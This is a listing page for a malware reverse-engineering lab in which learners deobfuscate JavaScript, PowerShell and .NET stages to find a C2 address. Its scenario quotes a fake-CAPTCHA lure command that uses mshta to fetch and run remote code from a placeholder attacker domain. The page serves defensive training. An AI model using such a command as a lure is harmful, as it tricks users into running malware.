MalMusic
HardMalware Reverse Engineering
Overview
One user reported that he was hacked by running this command in the Run command box: mshta https://[attacker_domain]/panda-eyes-colorblind.mp3 # UID: 887610 – I am not a robot – Verify CAPTCHA sequence
Flag format:
flag{(c2_ip_address)}
Lab Details
Prerequisites & Requirements
- Intermediate JavaScript Proficiency: A solid understanding of JavaScript syntax, common obfuscation techniques, and the ability to debug and modify scripts for analysis.
- Intermediate PowerShell Expertise: Familiarity with PowerShell scripting, including command execution, variable manipulation, and understanding typical obfuscation methods used in PowerShell payloads.
- Intermediate .NET C# Knowledge: A good grasp of C# programming concepts, the .NET framework, and experience with decompilers to analyze compiled .NET executables.
What will you learn?
- Deobfuscate Multi-Stage JavaScript Payloads: Master techniques for deobfuscating complex JavaScript code, including hex decoding, character code transformations, and identifying execution chains.
- Reverse Engineer Obfuscated PowerShell Scripts: Gain proficiency in analyzing and deobfuscating PowerShell scripts that utilize various techniques such as custom functions, array manipulations, and cryptographic operations (
e.g., AES, Gzip). - Perform Dynamic .NET Malware Analysis: Develop skills in dynamically analyzing .NET executables using tools like dnSpy, including setting breakpoints, stepping through code, and extracting critical runtime information like C2 addresses.
Tools
- A JavaScript Engine (
e.g.,Node.js): For executing and debugging JavaScript code extracted from initial stages of the malware. - PowerShell: To execute and deobfuscate intermediate PowerShell scripts.
- CyberChef: A versatile web-based tool for various data transformations, including Base64 decoding and hex conversions.
Job Positions
Malware Analyst
Tags
DecompilerStatic AnalysisDynamic AnalysisObfuscationC2 Communication